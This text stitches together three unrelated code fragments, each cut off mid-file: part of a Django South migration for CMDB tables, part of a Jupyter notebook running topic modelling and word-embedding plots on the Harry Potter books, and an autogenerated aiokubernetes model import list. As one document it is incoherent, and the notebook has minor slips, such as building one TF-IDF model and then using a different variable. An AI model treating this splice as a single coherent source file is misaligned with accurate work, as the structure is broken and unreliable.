self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIRelation.created'
db.add_column('cmdb_cirelation', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIRelation.modified'
db.add_column('cmdb_cirelation', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIRelation.cache_version'
db.add_column('cmdb_cirelation', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIType.created'
db.add_column('cmdb_citype', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIType.modified'
db.add_column('cmdb_citype', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIType.cache_version'
db.add_column('cmdb_citype', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIAttributeValue.created'
db.add_column('cmdb_ciattributevalue', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIAttributeValue.modified'
db.add_column('cmdb_ciattributevalue', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIAttributeValue.cache_version'
db.add_column('cmdb_ciattributevalue', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIChange.created'
db.add_column('cmdb_cichange', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIChange.modified'
db.add_column('cmdb_cichange', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIChange.cache_version'
db.add_column('cmdb_cichange', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
def backwards(self, orm):
# Deleting field 'CIValueFloat.created'
db.delete_column('cmdb_civaluefloat', 'created')
# Deleting field 'CIValueFloat.modified'
db.delete_column('cmdb_civaluefloat', 'modified')
# Deleting field 'CIValueFloat.cache_version'
db.delete_column('cmdb_civaluefloat', 'cache_version')
# Deleting field 'CIContentTypePrefix.created'
db.delete_column('cmdb_cicontenttypeprefix', 'created')
# Deleting field 'CIContentTypePrefix.modified'
db.delete_column('cmdb_cicontenttypeprefix', 'modified')
# Deleting field 'CIContentTypePrefix.cache_version'
db.delete_column('cmdb_cicontenttypeprefix', 'cache_version')
# Deleting field 'CIValueChoice.created'
db.delete_column('cmdb_civaluechoice', 'created')
# Deleting field 'CIValueChoice.modified'
db.delete_column('cmdb_civaluechoice', 'modified')
# Deleting field 'CIValueChoice.cache_version'
db.delete_column('cmdb_civaluechoice', 'cache_version')
# Deleting field 'CIValueString.created'
db.delete_column('cmdb_civaluestring', 'created')
# Deleting field 'CIValueString.modified'
db.delete_column('cmdb_civaluestring', 'modified')
# Deleting field 'CIValueString.cache_version'
db.delete_column('cmdb_civaluestring', 'cache_version')
# Deleting field 'CI.created'
db.delete_column('cmdb_ci', 'created')
# Deleting field 'CI.modified'
db.delete_column('cmdb_ci', 'modified')
# Deleting field 'CI.cache_version'
db.delete_column('cmdb_ci', 'cache_version')
# Deleting field 'CIChangeGit.created'
db.delete_column('cmdb_cichangegit', 'created')
# Deleting field 'CIChangeGit.modified'
db.delete_column('cmdb_cichangegit', 'modified')
# Deleting field 'CIChangeGit.cache_version'
db.delete_column('cmdb_cichangegit', 'cache_version')
# Deleting field 'PuppetResourceStatus.created'
db.delete_column('cmdb_puppetresourcestatus', 'created')
# Deleting field 'PuppetResourceStatus.modified'
db.delete_column('cmdb_puppetresourcestatus', 'modified')
# Deleting field 'PuppetResourceStatus.cache_version'
db.delete_column('cmdb_puppetresourcestatus', 'cache_version')
# Deleting field 'PuppetLog.created'
db.delete_column('cmdb_puppetlog', 'created')
# Deleting field 'PuppetLog.modified'
db.delete_column('cmdb_puppetlog', 'modified')
# Deleting field 'PuppetLog.cache_version'
db.delete_column('cmdb_puppetlog', 'cache_version')
# Deleting field 'CILayer.created'
db.delete_column('cmdb_cilayer', 'created')
# Deleting field 'CILayer.modified'
db.delete_column('cmdb_cilayer', 'modified')
# Deleting field 'CILayer.cache_version'
db.delete_column('cmdb_cilayer', 'cache_version')
# Deleting field 'CIIncident.created'
db.delete_column('cmdb_ciincident', 'created')
# Deleting field 'CIIncident.modified'
db.delete_column('cmdb_ciincident', 'modified')
# Deleting field 'CIIncident.cache_version'
db.delete_column('cmdb_ciincident', 'cache_version')
# Deleting field 'CIValueDate.created'
db.delete_column('cmdb_civaluedate', 'created')
# Deleting field 'CIValueDate.modified'
db.delete_column('cmdb_civaluedate', 'modified')
# Deleting field 'CIValueDate.cache_version'
db.delete_column('cmdb_civaluedate', 'cache_version')
# Deleting field 'CIAttribute.created'
db.delete_column('cmdb_ciattribute', 'created')
# Deleting field 'CIAttribute.modified'
db.delete_column('cmdb_ciattribute', 'modified')
# Deleting field 'CIAttribute.cache_version'
db.delete_column('cmdb_ciattribute', 'cache_version')
# Deleting field 'CIChangeZabbixTrigger.created'
db.delete_column('cmdb_cichangezabbixtrigger', 'created')
# Deleting field 'CIChangeZabbixTrigger.modified'
db.delete_column('cmdb_cichangezabbixtrigger', 'modified')
# Deleting field 'CIChangeZabbixTrigger.cache_version'
db.delete_column('cmdb_cichangezabbixtrigger', 'cache_version')
# Deleting field 'CIProblem.created'
db.delete_column('cmdb_ciproblem', 'created')
# Deleting field 'CIProblem.modified'
db.delete_column('cmdb_ciproblem', 'modified')
# Deleting field 'CIProblem.cache_version'
db.delete_column('cmdb_ciproblem', 'cache_version')
# Deleting field 'CIChangeStatusOfficeIncident.created'
db.delete_column('cmdb_cichangestatusofficeincident', 'created')
# Deleting field 'CIChangeStatusOfficeIncident.modified'
db.delete_column('cmdb_cichangestatusofficeincident', 'modified')
# Deleting field 'CIChangeStatusOfficeIncident.cache_version'
db.delete_column('cmdb_cichangestatusofficeincident', 'cache_version')
# Deleting field 'CIChangePuppet.created'
db.delete_column('cmdb_cichangepuppet', 'created')
# Deleting field 'CIChangePuppet.modified'
db.delete_column('cmdb_cichangepuppet', 'modified')
# Deleting field 'CIChangePuppet.cache_version'
db.delete_column('cmdb_cichangepuppet', 'cache_version')
# Deleting field 'CIValueInteger.created'
db.delete_column('cmdb_civalueinteger', 'created')
# Deleting field 'CIValueInteger.modified'
db.delete_column('cmdb_civalueinteger', 'modified')
# Deleting field 'CIValueInteger.cache_version'
db.delete_column('cmdb_civalueinteger', 'cache_version')
# Deleting field 'CIRelation.created'
db.delete_column('cmdb_cirelation', 'created')
# Deleting field 'CIRelation.modified'
db.delete_column('cmdb_cirelation', 'modified')
# Deleting field 'CIRelation.cache_version'
db.delete_column('cmdb_cirelation', 'cache_version')
# Deleting field 'CIType.created'
db.delete_column('cmdb_citype', 'created')
# Deleting field 'CIType.modified'
db.delete_column('cmdb_citype', 'modified')
# Deleting field 'CIType.cache_version'
db.delete_column('cmdb_citype', 'cache_version')
# Deleting field 'CIAttributeValue.created'
db.delete_column('cmdb_ciattributevalue', 'created')
# Deleting field 'CIAttributeValue.modified'
db.delete_column('cmdb_ciattributevalue', 'modified')
# Deleting field 'CIAttributeValue.cache_version'
db.delete_column('cmdb_ciattributevalue', 'cache_version')
# Deleting field 'CIChange.created'
db.delete_column('cmdb_cichange', 'created')
# Deleting field 'CIChange.modified'
db.delete_column('cmdb_cichange', 'modified')
# Deleting field 'CIChange.cache_version'
db.delete_column('cmdb_cichange', 'cache_version')
models = {
'cmdb.ci': {
'Meta': {'unique_together': "((u'content_type', u'object_id'),)", 'object_name': 'CI'},
'added_manually': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'barcode': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True'}),
'business_service': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'layers': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cmdb.CILayer']", 'symmetrical': 'False'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'pci_scope': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'relations': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cmdb.CI']", 'through': "orm['cmdb.CIRelation']", 'symmetrical': 'False'}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '2', 'max_length': '11'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2', 'max_length': '11'}),
'technical_service': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CIType']"}),
'uid': ('django.db.models.fields.CharField', [], {'max_length': '100', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'zabbix_id': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'})
},
'cmdb.ciattribute': {
'Meta': {'object_name': 'CIAttribute'},
'attribute_type': ('django.db.models.fields.IntegerField', [], {'max_length': '11'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'choices': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'ci_types': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cmdb.CIType']", 'symmetrical': 'False'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'cmdb.ciattributevalue': {
'Meta': {'object_name': 'CIAttributeValue'},
'attribute': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CIAttribute']"}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'ci': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CI']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'value_choice': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CIValueChoice']", 'null': 'True', 'blank': 'True'}),
'value_date': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CIValueDate']", 'null': 'True', 'blank': 'True'}),
'value_float': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CIValueFloat']", 'null': 'True', 'blank': 'True'}),
'value_integer': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CIValueInteger']", 'null': 'True', 'blank': 'True'}),
'value_string': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CIValueString']", 'null': 'True', 'blank': 'True'})
},
'cmdb.cichange': {
'Meta': {'unique_together': "((u'content_type', u'object_id'),)", 'object_name': 'CIChange'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'ci': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CI']", 'null': 'True', 'blank': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'priority': ('django.db.models.fields.IntegerField', [], {'max_length': '11'}),
'time': ('django.db.models.fields.DateTimeField', [], {}),
'type': ('django.db.models.fields.IntegerField', [], {'max_length': '11'})
},
'cmdb.cichangegit': {
'Meta': {'object_name': 'CIChangeGit'},
'author': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'changeset': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'comment': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'file_paths': | |
= re.compile(r"0\.[0-9]{3}\*")
model_topics = [(topic_no, re.sub(topic_sep, '', model_topic).split(' + ')) for topic_no, model_topic in
model.print_topics(num_topics=num_topics, num_words=5)]
descriptors = []
for i, m in model_topics:
print(i+1, ", ".join(m[:5]))
descriptors.append(", ".join(m[:2]).replace('"', ''))
# #### 2.5.2- DYNAMIC TOPIC MODELING -- LdaSeqModel
# <a id="dynamic"></a>
# In[41]:
'''Analyzing the changes of three topics btetween the two halves of Harry Potter 1 and the two halves of Harry Potter 7
'''
#Create an object toklist_17 containing the tokens for Book1 and Book 7 together
toklist_17 = corpustot.loc[corpustot['Book'].isin(['Harry Potter 1','Harry Potter 7'])]['Tokens'].to_list()
#List of the tokens for book1 and book 7 (ordered) -- len(toklist17 = 21618)
#HP 1 Has 6647 rows of tokens
#HP 7 has 14971 rows of tokens
#A before, we consider bigrams
phrases_17 = Phrases(toklist_17)
bigram_17 = Phraser(phrases_17)
bigrams_17 = list(bigram_17[toklist_17])
print(len(bigrams_17))
# In[42]:
#Create the relevant corpus and build up a dictionary
sent_big_17 = pd.Series(bigrams_17)
dictionary_big_17 = Dictionary(sent_big_17)
dictionary_big_17.filter_extremes(no_below=100, no_above=0.1)
print(dictionary_big_17, flush=True)
ldacorpus_17 = [dictionary_big_17.doc2bow(text) for text in sent_big_17]
tfidfmodel_17 = TfidfModel(ldacorpus_17)
model_corpus_17 = tfidfmodel[ldacorpus_17]
print(sent_big_17[0])
print(ldacorpus_17[0])
print(model_corpus_17[0])
time_slice = [3323,3324,7485,7486]
#Time slots I am considering
#First time slot represents the first half of Book1
#Second time slot represents the second half of Book1
#Third time slot represents the first half of Book7
#Fourth time slot represents the second half of Book7
#Run the LDA Seq model that allows to track the dynamics of the topics.
ldaseq = ldaseqmodel.LdaSeqModel(corpus=ldacorpus_17,
id2word=dictionary_big_17,
time_slice=time_slice,
num_topics=3)
# In[43]:
#Look at the three different topics at time 0 (corresponding to the first book)
ldaseq.print_topics(time=0)
# In[44]:
ldaseq.print_topics(time=1) #Look at the three different topics at time 1 (corresponding to book7)
# In[45]:
#ldaseq.print_topic_times(topic=0) # Evolution of 1st topic along the four time slots
ldaseq.print_topic_times(topic=1) # Evolution of 2nd topic along the four time slots
#ldaseq.print_topic_times(topic=2) # Evolution of 3rd topic along the four time slots
#There can be seen some sligth changes along the periods
#The relative weight of some terms changes in particolar between the first two slots (represetning book1) and the second two slots (representing book7)
# In[46]:
doc = ldaseq.doc_topics(500) #Compare the composition of different documents(=sentences)
#Choose one document that belongs to Book1 i.e doc(500)
print(doc)
# In[47]:
doc = ldaseq.doc_topics(7000) #Look at the topic composition of a document
#Choose one document that belongs to Book1 i.e doc(500)
print (doc)
# ### 2.6- MATRIX FACTORIZATION
# <a id="matrix"></a>
# In[48]:
#NMF FACTORIZATION
documents = corpustot['Instances'].to_list() #Defining the input which is a List of all the instances
tfidf_vectorizer = TfidfVectorizer(analyzer='word', ngram_range=(1,2), min_df=0.001, max_df=0.75, stop_words='english', sublinear_tf=True)
X = tfidf_vectorizer.fit_transform(documents)
tfidf_vectorizer.get_feature_names()
print(X.shape)
# In[49]:
k = 10
nmf = NMF(n_components=k, init='nndsvd', random_state=0)
get_ipython().run_line_magic('time', 'W = nmf.fit_transform(X)')
H = nmf.components_
print(W.shape, H.shape)
# In[50]:
def show_topics(A, vocabulary, topn=5):
"""
find the top N words for each of the latent dimensions (=rows) in a
"""
topic_words = ([[vocabulary[i] for i in np.argsort(t)[:-topn-1:-1]]
for t in A])
return [', '.join(t) for t in topic_words]
# In[51]:
terms = tfidf_vectorizer.get_feature_names()
sorted(show_topics(H, terms)) #Show the topics obtained using NMF Factorization
# In[52]:
#SVD MATRIX FACTORIZATION
svd = TruncatedSVD(n_components=k)
get_ipython().run_line_magic('time', 'U = svd.fit_transform(X)')
S = svd.singular_values_
V = svd.components_
print(U.shape, S.shape, V.shape)
sorted(show_topics(V, terms)) #Show the topics obtained with SVD Factorization
# ### 2.7- CLUSTERING
# <a id="clustering"></a>
# In[53]:
k = 4 #Number of clusters chosen assuming each pair of books could be around one cluster
get_ipython().run_line_magic('time', 'X2 = TruncatedSVD(n_components=800).fit_transform(X)')
agg = AgglomerativeClustering(n_clusters=k)
# In[54]:
sample = np.random.choice(len(X2), replace=False, size=3000)
get_ipython().run_line_magic('time', 'agg_sample = agg.fit_predict(X2[sample])')
# In[55]:
# let's get the centroid/average of each cluster
centroids = np.array([X2[sample][agg_sample == c].mean(axis=0) for c in range(k)])
print(centroids.shape)
# In[56]:
# initialize k-means with the agglomerative clusters
km = KMeans(n_clusters=k, n_jobs=-1, init=centroids)
get_ipython().run_line_magic('time', 'km.fit(X2)')
# In[57]:
silhouettes = [] #Evaluate the silhouette score for different numbers of clusters and look at the trend
K = range(3,15)
for c in K:
agg_clustering = AgglomerativeClustering(n_clusters=c)
agg_cluster_ids = agg_clustering.fit_predict(X2[sample])
# agg_centroids = np.array([X2[[i for i, v in enumerate(agg_cluster_ids) if v == k]].mean(axis=0)
# for k in range(c)])
# kmeans_clustering = KMeans(n_clusters=c, n_jobs=-1, init=agg_centroids)
# kmeans_ids = kmeans_clustering.fit_predict(X2)
score = silhouette_score(X2[sample], agg_cluster_ids)
silhouettes.append(score)
print(c, score)
fig, ax = plt.subplots(figsize=(20,10))
plt.plot(K, silhouettes, 'bx-')
plt.xlabel('k')
plt.ylabel('Silhouette score')
plt.title('Silhouette Method For Optimal k')
plt.show()
#4 Topics seems to be appropriate
# ## 3. Visualization
# <a id="visualization"></a>
# ### 3.1- WORD EMBEDDINGS VISUALIZATION
# <a id="word-visua"></a>
# In[86]:
'''
T-sne to visualize word embeddings
'''
def words_space_tsne(model, word, list_names):
""" Plot in seaborn the results from the t-SNE of a word,
its list of most similar words, and a list of random words.
"""
arrays = np.empty((0, 300), dtype='f')
word_labels = [word]
color_list = ['red']
arrays = np.append(arrays, model.wv.__getitem__([word]), axis=0)
close_words = model.wv.most_similar(positive = [word]) #Get the most similar words
for wrd_score in close_words:
wrd_vector = model.wv.__getitem__([wrd_score[0]])
word_labels.append(wrd_score[0])
color_list.append('blue')
arrays = np.append(arrays, wrd_vector, axis=0)
for wrd in list_names: #Represent the list of random words
wrd_vector = model.wv.__getitem__([wrd])
word_labels.append(wrd)
color_list.append('green')
arrays = np.append(arrays, wrd_vector, axis=0)
reduc = PCA(n_components=19).fit_transform(arrays) #Reduce dimensionality using PCA
np.set_printoptions(suppress=True) #tsne representation
Y = TSNE(n_components=2, random_state=0, perplexity=15).fit_transform(reduc)
df = pd.DataFrame({'x': [x for x in Y[:, 0]],
'y': [y for y in Y[:, 1]],
'words': word_labels,
'color': color_list})
fig, _ = plt.subplots()
fig.set_size_inches(9, 9)
p1 = sns.regplot(data=df, x="x",y="y", fit_reg=False, marker="o", scatter_kws={'s': 40,'facecolors': df['color']})
for line in range(0, df.shape[0]): #Add labels
p1.text(df["x"][line],
df['y'][line],' ' + df["words"][line].title(),horizontalalignment='left',
verticalalignment='bottom', size='medium',
color=df['color'][line],
weight='normal'
).set_size(15)
plt.xlim(Y[:, 0].min()-50, Y[:, 0].max()+50)
plt.ylim(Y[:, 1].min()-50, Y[:, 1].max()+50)
plt.title('t-SNE visualization for {}'.format(word.title()))
# In[87]:
words_space_tsne(w2v_model, 'harry', ['magic', 'school','death_eater','ginny', 'train', 'hermione', 'ron','dumbledore'])
# ### 3.2- TSNE WORD2VEC VISUALIZATION
# <a id="tsne"></a>
# In[88]:
tsne = sklearn.manifold.TSNE(n_components=2, random_state=0)
all_word_vectors_matrix = w2v_model.wv.vectors
all_word_vectors_matrix_2d = tsne.fit_transform(all_word_vectors_matrix)
points = pd.DataFrame(
[
(word, coords[0], coords[1])
for word, coords in [
(word, all_word_vectors_matrix_2d[w2v_model.wv.vocab[word].index])
for word in w2v_model.wv.vocab
]
],
columns=["word", "x", "y"]
)
sns.set_context("poster")
points.plot.scatter("x", "y", s=10,c='blue',figsize=(20, 12),alpha=0.4)
# ### 3.3- WORD2VEC FOR BOOK1 AND BOOK7 REPRESENTATION
# <a id="book1book7"></a>
# In[89]:
def tsne_scatter(model):
labels = []
tokens = []
for word in model.wv.vocab:
tokens.append(model.wv.__getitem__(word))
labels.append(word)
tsne_model = TSNE(perplexity=15, n_components=2, init='pca', n_iter=2500)
new_values = tsne_model.fit_transform(tokens)
x = []
y = []
for value in new_values:
x.append(value[0])
y.append(value[1])
plt.figure(figsize=(20, 20))
for i in range(len(x)):
plt.scatter(x[i],y[i],alpha = 0.4)
plt.annotate(labels[i], xy=(x[i], y[i]), xytext=(5, 2), textcoords='offset points', ha='left', va='top',fontsize = 12)
plt.title('Visualization {}'.format(model),fontsize=20)
plt.show()
# In[90]:
tsne_scatter(w2v_model_1)
# In[91]:
tsne_scatter(w2v_model_7)
# ### 3.4- PCA WORD EMBEDDINGS VISUALIZATION
# <a id="pcavisua"></a>
# In[92]:
def display_pca_scatterplot(model, words=None, sample=0):
if words == None:
if sample > 0:
words = np.random.choice(list(model.vocab.keys()), sample)
else:
words = [ word for word in model.vocab ]
word_vectors = np.array([model.wv.__getitem__(w) for w in words])
twodim = PCA().fit_transform(word_vectors)[:,:2]
plt.figure(figsize=(10,10))
plt.scatter(twodim[:,0], twodim[:,1], edgecolors='k', c='r',alpha=0.4)
for word, (x,y) in zip(words, twodim):
plt.text(x+0.001, y+0.001, word, horizontalalignment='left',verticalalignment='center', fontsize = 12)
# In[93]:
#Plot PCA word embeddings visualization for a list of words
#For instance the list ['harry','ron','hermione','dumbledore','snape','voldemort','say','look','gryffindor'] which is quite small and contains come relevant terms
#We could have defined whatever list of words
#We could also plot the whole dictionary of words (but it becomes not readable)
# To plot the whole vacabulary use words = w2v_model.wv.vocab.keys()
words =['harry','ron','hermione','dumbledore','snape','voldemort','say','look','gryffindor']
display_pca_scatterplot(w2v_model, words)
# ##### 3.5- UNIGRAMS TF-IDF-TFIDF VISUALIZATION scaled by TF
# <a id="tf-scaled"></a>
# In[94]:
get_ipython().run_line_magic('matplotlib', 'inline')
plt.figure(figsize=(12,8))
sns.set_context('poster')
plot = sns.scatterplot('tfidf','idf',size='tf', data =uni_df,legend= False,alpha=0.4)
indeces = [381,718,497,395,710]
for index in indeces:
plot.text(uni_df.tfidf[index]+0.8, uni_df.idf[index]+0.2,uni_df.word[index], horizontalalignment='left', verticalalignment='top',fontsize=15)
# ### 3.6- BIGRAMS TF-IDF-TFIDF VISUALIZATION scaled by TF
# <a id="bigrams-scaled"></a>
# In[95]:
get_ipython().run_line_magic('matplotlib', 'inline')
sns.set_context('poster')
plt.figure(figsize=(12,8))
plot = sns.scatterplot('tfidf','idf',size ='tf', data =bi_df,legend= False,alpha=0.4)
indeces = [75,76,84,69,28,50,27,10]
for index in indeces:
plot.text(bi_df.tfidf[index]+1.2, bi_df.idf[index]+0.1, bi_df.word[index], horizontalalignment='left', verticalalignment='top',fontsize=12)
# ##### 3.7- HARRY - RON - HERMIONE OCCURENCIES VISUALIZATION
# <a id="harry-ron-occ"></a>
# In[96]:
HR_HHe_RHe.plot.line(xticks=range(0,7), yticks = (0,180))
plt.legend(loc='center left', bbox_to_anchor=(1.0, 0.5));
# In[97]:
HR_HHe_RHe.plot.bar(stacked=True)
plt.legend(loc='center left', bbox_to_anchor=(1.0, 0.5))
# In[98]:
#Plot separately the three frequencies
HR_HHe_RHe = HR_HHe.join(RHesum.add_suffix('_rhe'), on='Bookn')
HR_HHe_RHe = HR_HHe_RHe[['tf_hr', 'tf_hhe','tf_rhe']]
fig, ax = plt.subplots(nrows=1, ncols=4, figsize=(20, 10))
HR_HHe_RHe.plot.line( y='tf_hr', ax=ax[0], xticks=range(0,7));
HR_HHe_RHe.plot.line( y='tf_hhe', ax=ax[1], xticks=range(0,7));
HR_HHe_RHe.plot.line( y='tf_rhe', ax=ax[2], xticks=range(0,7));
HR_HHe_RHe.plot.line( y=['tf_hr','tf_hhe','tf_rhe'], ax=ax[3], xticks=range(0,7))
# ### 3.8- TOPIC MODELING VISUALIZATION
# <a id="topic-visua"></a>
# In[99]:
import pyLDAvis
import pyLDAvis.gensim
vis = pyLDAvis.gensim.prepare(topic_model=model, corpus = model_corpus,dictionary=dictionary_big)
pyLDAvis.enable_notebook()
pyLDAvis.display(vis)
#See the 'Topic Modeling Visualization' png file in the zip folder
# In[100]:
'''
Visualizing the distribution of topics across the different groups
'''
target_category = 'Book'
scores = [[t[1] for t in topic_corpus[entry]] for entry in range(len(sent_big))]
topic_distros = pd.DataFrame(data=scores, columns=descriptors)
topic_distros['HP'] = corpustot[target_category]
# In[101]:
topic_distros
# In[102]:
import matplotlib.pyplot as plt
import seaborn
seaborn.set_context('poster')
fig, ax = plt.subplots(figsize=(20, 10))
aggregate_by_category = topic_distros[topic_distros.HP.isin('Harry Potter 1,Harry Potter 2,Harry Potter 3,Harry Potter 4,Harry Potter 5,Harry Potter 6,Harry Potter 7'.split(','))]
aggregate_by_category = aggregate_by_category.groupby(aggregate_by_category.HP).mean()
aggregate_by_category[descriptors].plot.bar(ax=ax);
plt.legend(loc='center left', bbox_to_anchor=(1.0, 0.5));
# ### 3.9- CLUSTERING VISUALIZATION
# <a id="clust-visua"></a>
# In[103]:
sns.set_context('notebook')
def plot_vectors(vectors, title='VIZ', labels=None, dimensions=3):
"""
| |
<reponame>tantioch/aiokubernetes<filename>aiokubernetes/models/__init__.py
# coding: utf-8
# flake8: noqa
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: v1.10.6
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
# import models into model package
from aiokubernetes.models.admissionregistration_v1beta1_service_reference import AdmissionregistrationV1beta1ServiceReference
from aiokubernetes.models.apiregistration_v1beta1_service_reference import ApiregistrationV1beta1ServiceReference
from aiokubernetes.models.apps_v1beta1_deployment import AppsV1beta1Deployment
from aiokubernetes.models.apps_v1beta1_deployment_condition import AppsV1beta1DeploymentCondition
from aiokubernetes.models.apps_v1beta1_deployment_list import AppsV1beta1DeploymentList
from aiokubernetes.models.apps_v1beta1_deployment_rollback import AppsV1beta1DeploymentRollback
from aiokubernetes.models.apps_v1beta1_deployment_spec import AppsV1beta1DeploymentSpec
from aiokubernetes.models.apps_v1beta1_deployment_status import AppsV1beta1DeploymentStatus
from aiokubernetes.models.apps_v1beta1_deployment_strategy import AppsV1beta1DeploymentStrategy
from aiokubernetes.models.apps_v1beta1_rollback_config import AppsV1beta1RollbackConfig
from aiokubernetes.models.apps_v1beta1_rolling_update_deployment import AppsV1beta1RollingUpdateDeployment
from aiokubernetes.models.apps_v1beta1_scale import AppsV1beta1Scale
from aiokubernetes.models.apps_v1beta1_scale_spec import AppsV1beta1ScaleSpec
from aiokubernetes.models.apps_v1beta1_scale_status import AppsV1beta1ScaleStatus
from aiokubernetes.models.extensions_v1beta1_allowed_flex_volume import ExtensionsV1beta1AllowedFlexVolume
from aiokubernetes.models.extensions_v1beta1_allowed_host_path import ExtensionsV1beta1AllowedHostPath
from aiokubernetes.models.extensions_v1beta1_deployment import ExtensionsV1beta1Deployment
from aiokubernetes.models.extensions_v1beta1_deployment_condition import ExtensionsV1beta1DeploymentCondition
from aiokubernetes.models.extensions_v1beta1_deployment_list import ExtensionsV1beta1DeploymentList
from aiokubernetes.models.extensions_v1beta1_deployment_rollback import ExtensionsV1beta1DeploymentRollback
from aiokubernetes.models.extensions_v1beta1_deployment_spec import ExtensionsV1beta1DeploymentSpec
from aiokubernetes.models.extensions_v1beta1_deployment_status import ExtensionsV1beta1DeploymentStatus
from aiokubernetes.models.extensions_v1beta1_deployment_strategy import ExtensionsV1beta1DeploymentStrategy
from aiokubernetes.models.extensions_v1beta1_fs_group_strategy_options import ExtensionsV1beta1FSGroupStrategyOptions
from aiokubernetes.models.extensions_v1beta1_host_port_range import ExtensionsV1beta1HostPortRange
from aiokubernetes.models.extensions_v1beta1_id_range import ExtensionsV1beta1IDRange
from aiokubernetes.models.extensions_v1beta1_pod_security_policy import ExtensionsV1beta1PodSecurityPolicy
from aiokubernetes.models.extensions_v1beta1_pod_security_policy_list import ExtensionsV1beta1PodSecurityPolicyList
from aiokubernetes.models.extensions_v1beta1_pod_security_policy_spec import ExtensionsV1beta1PodSecurityPolicySpec
from aiokubernetes.models.extensions_v1beta1_rollback_config import ExtensionsV1beta1RollbackConfig
from aiokubernetes.models.extensions_v1beta1_rolling_update_deployment import ExtensionsV1beta1RollingUpdateDeployment
from aiokubernetes.models.extensions_v1beta1_run_as_user_strategy_options import ExtensionsV1beta1RunAsUserStrategyOptions
